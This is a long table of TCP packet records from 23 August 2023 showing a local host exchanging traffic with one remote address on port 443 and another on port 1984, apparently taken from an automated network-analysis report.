Aug 23, 2023 19:30:33.870009899 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.870060921 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.870157003 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.870228052 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.870261908 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.870275021 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.870299101 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.870343924 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.870376110 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.870408058 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.870891094 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.870920897 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.871006012 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.871037960 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.871068001 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.871428013 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.871493101 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.871547937 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.871581078 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.871613026 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.872281075 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.872312069 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.872365952 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.872402906 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.872440100 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.872999907 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.873037100 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.873091936 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.873126984 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.873159885 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.873557091 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.873585939 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.873636961 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.873668909 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.873698950 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.874130011 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.874165058 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.874206066 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.874237061 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.874270916 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.874697924 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.874731064 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.874780893 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.874813080 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.874845028 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.876600981 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.908026934 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.908081055 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.908199072 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.908273935 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.908282995 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.908344030 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.908389091 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.908389091 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.908427954 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.908597946 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.908634901 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.908708096 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.908742905 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.908780098 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.908804893 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.909008026 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.909039974 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.909106016 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.909143925 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.909176111 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.909199953 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.909332037 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.909358978 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.909429073 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.909461021 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.909490108 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.909540892 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.920444965 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.944391012 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.944454908 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.944598913 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.944606066 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.944642067 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.944674015 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.944679976 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.944706917 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.944715023 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.944747925 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.944766045 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.944785118 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.944809914 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.944849014 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.944858074 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.944899082 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.944927931 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.944947004 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.944973946 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.945007086 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.945017099 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.945044041 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.945069075 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.945103884 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.945113897 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.945123911 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.945137978 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.945163012 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.945188999 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.945188999 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.945209026 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.945233107 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.945241928 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.945259094 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.945265055 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.945297956 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.945314884 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.945328951 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.945338011 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.945358992 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.945369959 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.945391893 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.945398092 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.945424080 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.945445061 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.945451021 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.945465088 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.945493937 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.945503950 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.945538044 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.945544958 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.945578098 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.946383953 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.946419954 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.946475029 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.946491003 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.946508884 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.946538925 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.947149038 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.947180033 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.947232962 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.947242975 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.947271109 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.947288990 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.980377913 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.980459929 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.980614901 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.980662107 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.980683088 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.980727911 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.980789900 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.980813980 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.980876923 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.980885029 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.980940104 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.980972052 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.981408119 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.981442928 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.981542110 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.981908083 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.981986046 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.982003927 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.982029915 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.982043028 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.982075930 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.982815027 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.982848883 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.982923985 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.982937098 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.982963085 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.982974052 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.982995033 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.983055115 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.983086109 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.983093023 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:33.983144045 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:33.983376980 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.015634060 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.015680075 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.015772104 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.015804052 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.015831947 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.015865088 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.016207933 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.016248941 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.016299963 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.016308069 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.016350985 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.016381979 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.016415119 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.016449928 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.016489983 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.016498089 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.016534090 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.016562939 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.016693115 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.016727924 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.016777992 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.016787052 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.016824961 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.016853094 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.016978979 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.017014980 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.017055035 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.017065048 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.017098904 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.017127991 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.017251968 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.017283916 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.017323971 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.017333984 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.017368078 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.017390966 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.017457008 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.017515898 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.017524004 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.017556906 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.017601967 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.022382021 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.026238918 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.026269913 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:34.026318073 CEST	49727	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:30:34.026328087 CEST	443	49727	185.181.116.217	192.168.2.3
Aug 23, 2023 19:30:47.749420881 CEST	49729	1984	192.168.2.3	185.216.71.113
Aug 23, 2023 19:30:47.775960922 CEST	1984	49729	185.216.71.113	192.168.2.3
Aug 23, 2023 19:30:47.776103973 CEST	49729	1984	192.168.2.3	185.216.71.113
Aug 23, 2023 19:30:47.786288977 CEST	49729	1984	192.168.2.3	185.216.71.113
Aug 23, 2023 19:30:47.992620945 CEST	1984	49729	185.216.71.113	192.168.2.3
Aug 23, 2023 19:30:48.449664116 CEST	1984	49729	185.216.71.113	192.168.2.3
Aug 23, 2023 19:30:48.531124115 CEST	49729	1984	192.168.2.3	185.216.71.113
Aug 23, 2023 19:30:48.560383081 CEST	1984	49729	185.216.71.113	192.168.2.3
Aug 23, 2023 19:30:48.567646980 CEST	49729	1984	192.168.2.3	185.216.71.113
Aug 23, 2023 19:30:48.781162977 CEST	1984	49729	185.216.71.113	192.168.2.3
Aug 23, 2023 19:30:48.781317949 CEST	49729	1984	192.168.2.3	185.216.71.113
Aug 23, 2023 19:30:48.984447956 CEST	1984	49729	185.216.71.113	192.168.2.3
Aug 23, 2023 19:31:17.326967955 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:17.327023029 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:17.327193975 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:17.331581116 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:17.331619024 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:17.436125994 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:17.436235905 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:17.440191984 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:17.440215111 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:17.440814018 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:17.534482956 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.422555923 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.455423117 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.487936974 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.487965107 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.488009930 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.488035917 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.488127947 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.488168001 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.488189936 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.488200903 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.488214016 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.488219023 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.488239050 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.488254070 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.488255024 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.488255024 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.488270998 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.488286018 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.488296986 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.488306999 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.488332987 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.520620108 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.520665884 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.520859003 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.520896912 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.520961046 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.521049023 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.521087885 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.521152973 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.521171093 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.521255016 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.552871943 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.552925110 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.553020954 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.553051949 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.553078890 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.553082943 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.553113937 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.553116083 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.553133965 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.553163052 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.553242922 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.553495884 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.553529024 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.553585052 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.553596020 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.553658962 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.553689957 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.553729057 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.553762913 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.553812981 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.553823948 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.553875923 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.553925991 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.553981066 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.554001093 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.554011106 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.554055929 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.554375887 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.554405928 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.554469109 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.554477930 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.554533005 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.585843086 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.585901976 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.586040974 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.586088896 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.586111069 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.586144924 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.586163044 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.586196899 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.586210966 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.586230993 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.586293936 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.586306095 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.586323023 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.586359024 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.586369991 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.586410999 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.586417913 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.586457014 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.586909056 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.586950064 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.587047100 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.587059975 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.587085009 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.587127924 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.587141991 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.587152004 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.587223053 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.587239981 CEST	49736	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:18.587244034 CEST	443	49736	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:18.587268114 CEST	443	49736	185.181.116.217	192.168.2.3
